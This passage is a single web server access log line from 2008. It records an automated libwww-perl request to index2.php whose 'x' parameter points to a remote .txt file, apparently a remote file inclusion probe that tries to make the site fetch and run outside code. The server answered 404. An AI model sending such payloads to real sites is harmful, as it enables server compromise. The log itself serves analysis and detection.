88.84.157.43 - - [31/Aug/2008:11:53:37 -0700] "GET //index2.php?x=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com" 88.84.157.4